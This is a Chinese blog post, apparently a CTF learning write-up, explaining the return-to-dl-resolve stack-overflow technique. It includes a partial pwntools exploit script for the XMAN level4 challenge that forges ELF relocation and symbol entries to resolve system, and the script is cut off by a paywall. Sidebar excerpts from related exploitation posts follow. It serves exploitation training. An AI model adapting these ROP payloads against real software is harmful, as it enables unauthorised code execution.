栈溢出利用之return to dl-resolve实例

最新推荐文章于 2024-09-24 18:00:58 发布
最新推荐文章于 2024-09-24 18:00:58 发布
阅读量3.5k 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: PWN 文章标签: 栈溢出 dl-resolve
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/guiguzi5512407/article/details/52752914
本文探讨栈溢出漏洞利用技术,重点关注return to dl-resolve的原理和实现。在32位及64位环境下,通过实验展示了如何在Ubuntu 16.04系统上利用该技术,包括手动和使用工具roputils进行漏洞利用的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

最近学习了一下漏洞原理与利用,学习到栈溢出漏洞利用的一些技巧,记录下自己的学习心得。关于return to dl-resolve的原理,网上有许多的文章已经写的很清楚了,就不赘述。本文主要是根据return to dl-resolve的原理,实现32位和64位环境下的漏洞利用。

0x00. 准备知识

(1) 实验环境:
64bit Ubuntu16.04, kernel : 4.4.0
(2) 32位与64位区别:
Linux下32位应用的参数传递主要是通过栈来传递;而64位应用的前六个参数分别通过RDI, RSI, RDX, RCX, R8和 R9传递,如果有多余的参数,才会通过栈来传递。因此,在覆盖返回值时,平衡堆栈时就需要用到gadget。
(3) return to dl-resolve
Linux下可执行文件ELF的动态链接时,采用了延迟绑定技术。原理是:动态链接的库里有许多函数,但是可执行文件ELF不会全部调用这些函数,有些函数直到程序运行结束也不会被调用。因此,Linux下的链接器动态链接时不会进行函数地址重定位,而是等到函数第一次被调用时,进行函数地址重地位,也就是通过_dl_runtime_resolve函数到库中查找该函数的实际地址,并将其写入到该函数的got表中。
当栈溢出后,我们就可以控制程序流程到dl-resolve,解析出system函数的地址,从而实现漏洞的利用。

0x01. 32位环境下的return to dl-resolve实例

下面以XMAN level4为例,分别使用手写和使用工具roputils实现漏洞利用。
return to dl-resolve by manul

#!/usr/bin/env python

from pwn import *

DEBUG = 1
if DEBUG:
    context.log_level = 'debug'
    p = process('./level4')
    gdb.attach(p)
else:
    p = remote('127.0.0.1', 10086)

offset = 0x8c
stack_size = 0x400
vulfun = 0x0804844b
bss_addr = 0x804a024
base_stage = bss_addr + stack_size

pppr = 0x8048509
p_ebp_r = 0x804850b
leave_r = 0x80483b8

elf = ELF('./level4')
write_plt = elf.plt['write']
read_plt = elf.plt['read']
write_got = elf.got['write']

def main():  
    payload1 = 'A' * offset + p32(read_plt) + p32(pppr) + p32(0) + p32(base_stage)
    payload1 += p32(100) + p32(p_ebp_r) + p32(base_stage) + p32(leave_r)
    p.sendline(payload1)

    plt_start = 0x8048300
    rel_plt = 0x80482b0
    index_offset = (base_stage + 28) - rel_plt
    dynsym_addr = 0x80481cc
    dynstr_addr = 0x804822c
    fake_sym = base_stage + 36
    align = 0x10 - ((fake_sym - dynsym_addr) & 0xf)
    fake_sym = fake_sym +align
    index_dynsym = (fake_sym - dynsym_addr) / 0x10
    r_info = (index_dynsym <<
最低0.47元/天 解锁文章

200万优质内容无限畅学
Mysql学习总结(15)——Mysql错误码大全
科技D人生
05-06 3125
B.1. 服务器错误代码和消息 服务器错误信息来自下述源文件: ·         错误消息信息列在share/errmsg.txt文件中。“%d”和“%s”分别代表编号和字符串,显示时,它们将被消息值取代。 ·         错误值列在share/errmsg.txt文件中,用于生成include/mysqld_error.h和include/mysqld_ername.h 
红队专题-与维持隐匿Privilege Escalation
aming小老弟
10-27 1672
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
ret2dlresolve以及srop
2301_81031055的博客
02-22 657
linux在加载ELF可执行文件的时候,包含的动态链接文件里的符号,并不会直接把这些符号的实际地址加载到内存中,而是会使用PLT + GOT 表来实现延迟绑定,简单说就是在第一次用到动态链接文件里的符号的时候才会去寻找符号的实际位置然后保存下来,下次使用的时候就可以直接访问了。所以我们就会想到用srop去解题,首先需要伪造栈帧信息,通过执行sigreturn(也就是syscall系统调用),还原出我们伪造的栈帧信息,来达到控制寄存器的目的 ,上面的网站有详细的讲解呦!这里我们可以直接通过脚本去获取权限。
Return-to-dl-resolve
weixin_44113469的博客
04-25 269
Return-to-dl-resolve是CTF中的高级rop技巧 2019国赛线上 baby_pwn exp import sys import roputils from pwn import * context.log_level = 'debug' #r = process("./pwn") p = process("./babypwn") rop = ropu...
ret2dl-resolve
fa1c4的blog
04-19 425
最早是2015年在一篇论文中提出的攻击技术. How the ELF Ruined Christmas 因为通常漏洞利用包含两个阶段 信息泄露, 得知内存布局 通过已知内存布局, 利用漏洞 但由于不是常常能够得知内存信息, 所以ret2dl-resolve是一种仅仅利用ELF文件格式和动态装载器弱点进行漏洞利用的方法. 符号解析图示 .rel.plt段由Elf_Rel结构体构成 Elf_Rel结构体 struct Elf32_Rel { Elf32_Addr r_offset; // Loca
ret2dl_resolve
最新发布
GalaxySpaceX的博客
09-24 936
ret2dl_resolve
pwn-ret2dl-resolve
CharlesGodX的博客
05-04 594
pwn-ret2dl-resolve 0x00:漏洞介绍 ret2dl-resovle这种技术在pwn中的运用也挺多的,可以类比Windows下的IAT技术进行学习,了解这个技术之前,我们需要知道ELF文件中各个函数的加载过程,下面就演示一下GOT表是如何加载的,首先我们编译一个简单的程序 #include <stdio.h> int main() { puts("Hello ...
公共漏洞利用程序分析与学习资源分享
这里作者详细说明了利用程序是如何通过堆溢出覆盖另一个对象中的对象指针,并且通过ret2dir攻击,即返回到库目录(return-to-dl-resolve)技术,使得攻击者能够控制程序的执行流。该技术通常用于绕过现代操作系统...
2021-6月面试总结-vue,uniapp,小程序,h5,更新中
m0_67266787的博客
02-24 1015
**一、**vue 2.6.11 vue****页面的生命周期? 总共分为8个阶段创建前/后,载入前/后,更新前/后,销毁前/后。 创建前/后: 在beforeCreate阶段,vue实例的挂载元素el和数据对象data都为undefined,还未初始化。在∗∗created∗∗阶段,vue实例的数据对象data有了,el和数据对象data都为undefined,还未初始化。在**created**阶段,vue实例的数据对象data有了,el和数据对象data都为undefined,还未初始化。在∗∗cre
栈溢出利用Return to dl-resolve
hl1293348082的专栏
04-09 272
0x00 前言 在CTF中一般的栈溢出题目会给出程序对应的libc,这样我们在泄漏一个libc地址之后就能根据偏移量去计算libc的其他地址,比如system、/bin/sh或是libc基址。 那如果题目中没有给出libc,我们就无法得知题目所用的libc版本。这个时候如果我们要计算system函数的地址的话,可以利用泄露出的libc地址去http://libcdb.com搜索对应的libc版本,因为一个libc函数地址的低三位在对应的libc版本中总是不变的。(当然你也可能搜不到) 今天要介绍的这项技术
栈溢出之ret2dlresolve
zyxx_wjc的博客
05-07 1062
三月份在buuctf上举办的DASCTF上有一道“简单"的栈题——checkin,然而我这个菜鸡拿到题之后直接麻爪了——没有输出咋泄露libc啊(这个Jmp.Cliff他就是逊啦......)......后来学长告诉我,有个技巧叫ret2dlresolve,可以处理这种没有输出的情况,自知基础不牢的我老老实实回到CTF wiki上找到了这个技巧,又参考了网上很多大佬的博客,啃了几天,总算是啃明白了。这两天国赛临近,正积极备赛,突然想到这个有些生疏的知识还未整理,就写个博客记录一下吧。 本文主要围绕64位下
ret2dlresolve归纳
am_03的博客
09-02 383
ret2dl_resolve的原理: 动态链接相关函数_dl_runtime_resolve(link_map_obj, reloc_index) 功能:在第一次调用某函数时运行,绑定其地址到对应的GOT表项 第一个参数link_map_obj一直为GOT[1]的地址 第二个参数reloc_index为被绑定函数在.rel.plt段里的相对偏移 原理: 1.调用_dl_runtime_resolve,修改reloc_index,令其指向伪造在栈里的重定向表表项 2.- 伪造重定向表表项,修改第二项里符号表索
【ret2dlresolve】学习和体会
ethan18的博客
08-07 148
我们用reloc_offset找到.rel.plt中的对应结构体,再通过rel_info在.dynsym中找到第[rel_info >>8]个结构体,最后通过st_name在.dynstr中找到第st_name个参数,这个参数是个字符串,表示的就是我们要的函数的名字。这里我画个图,手画的比较粗糙,来解释一下_dl_runtime_resolve(link_map,reloc_offset)函数。PLT[0]的保存的指针指向_dl_runtime_resolve的第一个参数:link_map。
ret2dl_resolve 知识点总结
qq_43189757的博客
07-11 469
ret2dl-resole 是通过伪造到 .rel.plt , .dynsym, .dynstr中表项中的偏移以及伪造这三个段中的数据结构来达到调用system 函数的目的 这三个段的信息都可以在IDA中 DYNAMIC 段中找到 DT_STRTAB -> .dynstr DT_SYMTAB -> .dynsym DT_JMPREL -> .rel.plt...
死活不懂ret2_dl_runtime_resolve,留着以后学
哒君的博客
07-27 401
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/advanced-rop-zh/#ret2_dl_runtime_resolve https://bbs.pediy.com/thread-227034.htm https://xz.aliyun.com/t/5122#toc-10 https://www.freebuf.co...
ret2dlresolve利用方法
九层台
05-10 2468
使用场景: 一遍运行(延迟绑定技术,只有在第一次调用该函数时才会调用_dll_runtime_resolve函数) 没有输出,没有system函数。 需要: 1.向一个固定地址写入数据(bss段) 2.能够劫持程序执行流 linux下c函数是放在libc库里面的 ldd pwn01 linux-gate.so.1 => (0xf7ef2000) libc.s...
pwntools使用第五弹——ret2dlresolve以及延迟绑定
小小鱼的博客
02-11 3872
简介 关于ret2dlresolve利用的原理,可以参考如下博文: https://www.freebuf.com/articles/system/170661.html ret2dlsolve的核心原理就是利用了延迟绑定技术,linux在加载ELF可执行文件的时候,包含的动态链接文件里的符号,并不会直接把这些符号的实际地址加载到内存中,而是会使用PLT + GOT 表来实现延迟绑定,简单说就是在第一次用到动态链接文件里的符号的时候才会去寻找符号的实际位置然后保存下来,下次使用的时候就可以直接访问了,关于延
栈溢出利用return to dl-resolve payload 构造原理(二)
M021的专栏
11-03 2189
return to dl-resolve payload构造原理
ret2dlresolve超详细教程(x86&x64)
qq_51868336的博客
03-10 6608
X86 前置知识 在Linux中,程序使用_dl_runtime_resolve(link_map,reloc_offset)来对动态链接的函数进行重定位。 而ret2dlresolve攻击的核心就是控制相应的参数及其对应地址的内容,从而控制解析的函数。 延迟绑定 第一次调用一个函数时,先是到plt表,然后jmp到got表 此时got表存的地址是在plt表上 其实也就是jmp got的下一条指令,这里先是push一个数字(该函数在rel.plt上的偏移,reloc_arg,后文会讲到),然后jmp到pl
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值